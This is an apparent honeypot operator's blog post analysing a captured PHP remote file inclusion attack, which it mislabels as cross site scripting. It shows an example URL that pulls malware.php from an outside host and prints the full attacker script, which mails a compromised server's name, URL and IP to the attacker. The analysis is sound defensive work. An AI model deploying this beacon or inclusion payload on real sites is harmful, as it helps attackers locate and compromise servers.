A Look At A Simple PHP Cross Site Scripting Attack

Someone was recently kind enough to attack my honeypot with an extremely simple PHP cross site scripting attack, suitable for teaching others.

How does a PHP cross site scripting attack work? Some PHP scripts allow loading of external scripts through special HTTP parameters. For example, am attacker could invoke a PHP cross site scripting attack against a vulnerable file using a URL such as:

http://myhoneypot.net/scripts/php/vulnerablescript.php?src=http://malwaresite.info/malware.php

The above attack would result in vulnerablescript.php executing malware.php.

One of the simplest attacks I've seen is detailed in the following lines:

<?php
$language = 'eng';
$auth     = 0;
$name     = ''; // md5 Login
$pass     = ''; // md5 Password
/**************************************************************************************************************************************************************/
error_reporting(0);
$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode ='setoran @'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = 'komixobh@gmail.com';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Ni Bos Link Nya : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Yang Gunain : $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode
Reply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);
?> 

In this attack, the server sends an email message to komixobh@gmail.com providing the server name and URL exploited. This effectively tells the attacker where their scanning script succeeded, so that they can attack with more advanced scripts.

Quite genius really, don't let the server admin see your full capabilities in case it's a honeypot. Unfortunately for our attacker, this script reveals his email address (komixobh@gmail.com) which is being posted publicly on my blog. My blog is frequented by spam crawlers on a regular basis, so hopefully komixobh enjoys speaking with Nigerian Princes and receiving offers for male "enhancement" drugs.

The exploit really is that simple though, write a PHP script, upload it somewhere, and exploit vulnerable scripts with cross site scripting.

This is why it's important to always maintain current security patches, and follow vendor and industry best practices for securing your web applications.

You can see more example PHP scripts at my Malware Analysis Google Code page.